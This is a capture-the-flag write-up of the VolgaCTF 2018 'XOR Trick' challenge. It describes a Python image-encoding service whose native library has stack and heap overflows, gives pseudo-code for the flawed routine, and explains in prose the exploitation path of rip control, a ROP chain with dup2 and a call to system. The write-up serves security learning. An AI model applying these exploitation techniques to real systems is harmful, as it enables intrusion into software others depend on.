hxp | VolgaCTF Quals 2018: pwn350 "XOR Trick" writeup

Sun, 25 March 2018 ~ aengelke

VolgaCTF Quals 2018: pwn350 "XOR Trick" writeup

The challenge consisted of a Python service which encodes a user-supplied message in a user-supplied image using a native Python library. Due to missing (wrong) length checks, the binary allowed for buffer overflows on the stack as well as on the heap.

Python service

The service runner (service.py) is a forking server, which performs the following operations for each connection:

Print out the exact Python version (3.5.2 (default, Nov 23 2017, 16:37:01) \n[GCC 5.4.0 20160609])
Read an image and a message
Parse the image to an array of RGB data
Hand image data and message over to the native library, which returns new image data
Encode the new data in a PNG and send it to the client

Native library

The native library (xtproc.so) compiled for x86-64 provides a single function process, which takes a three-dimensional numpy array for the image data and the message as bytes object as parameters. The function first transforms the image data into a contiguous form and allocates a new output array with the same size, which is returned in the end.

At this point, the function xor_trick is called, which performs the actual transformation. The function takes six arguments and is apparently written in in assembly by hand. In pseudo-code:

long xor_trick(long width, long height, const char* inbuf, char* outbuf, size_t msglen, const char* msg)
    mangler = "\x2A\x84\x10\x42\x1E\x5C\x14\xC5\x2A\x84\x10\x42\x1E\x5C\x14\xC5"
    buf = alloca(width * height * 3) // size aligned to 16
    for i = 0; i < msglen; i += 16
        buf[i:i+16] = msg[i:i+16] ^ mangler

    for i = 0; i < msglen; i++
        for bit = 0; bit < 8; bit += 2
            r13b:r14b:r15b = inbuf[0:3]
            inbuf += 3

            byte = buf[i] >> bit
            hi = (byte >> 1) & 1
            lo = byte & 1

            if (r13b ^ r14b ^ lo)
                r13b ^= 1
            else if (r14b ^ r15b ^ hi)
                r15b ^= 1

            outbuf[0:3] = r13b:r14b:r15b
            outbuf += 3

We can observe two buffer overflows in this code:

The buffer allocated on the stack depends on the size of the image data, but not on the length of the message – a small image with a large message immediately yields access to the rip.
The amount of data written in the output buffer also depends on the message length and not on the length of the image, yielding a heap buffer overflow. In addition, an image with large dimensions combined with a short message leads to an information leak as the buffer then contains uninitialized data.

This implies that we can easily control the rip by supplying an image of dimensions 1x1 and a large enough message (first 0x48 bytes are ignored/stored in registers). However, note that we always overflow the stack buffer and the heap buffer at the same time.

Finding suitable targets

But where to go from here? Even though the server is forking, implying that addresses are the same on different connections, we don’t know the address of the libc or similar. And although we are able to leak some pointers, they are not helpful at all, since we don’t know what they mean.

At this point, we tried to find the binary of the Python interpreter itself, since some detailed information was given. It turned out that the Python3 of an updated Ubuntu 15.04.3 gives exactly the same version identifier and to our surprise, it wasn’t a position-independent executable but linked to a static address.

Our first attempt was to jump to the interpreter loop, first using Py_Main(0, NULL) and then using PyRun_InteractiveLoop(stdin, ""). Unfortunately, stdio was not bound to our socket, which we circumvented by calling dup2(4, 0) and dup2(4, 1) at the beginning of our ROP-chain. But alas! For some (unknown) reason, reading from the socket always failed with EAGAIN. Writing to the socket is still possible, though. Then, we tried to run PyRun_SimpleString with a string supplied using our message. But again, this didn’t work, as we had to smash the heap to get this far (see above) and of course the interpreter calls malloc and free several times, causing the program to abort at some point.

Since it’s impossible to read from the socket, running /bin/sh via execve won’t help us either. Fortunately, since the interpreter is a big binary, tons of gadgets are available, allowing us to place a shell command on the stack and call system with this value.

Full exploit

See here.

Flag: VolgaCTF{M@ke_pyth0n_explo1table_ag@in}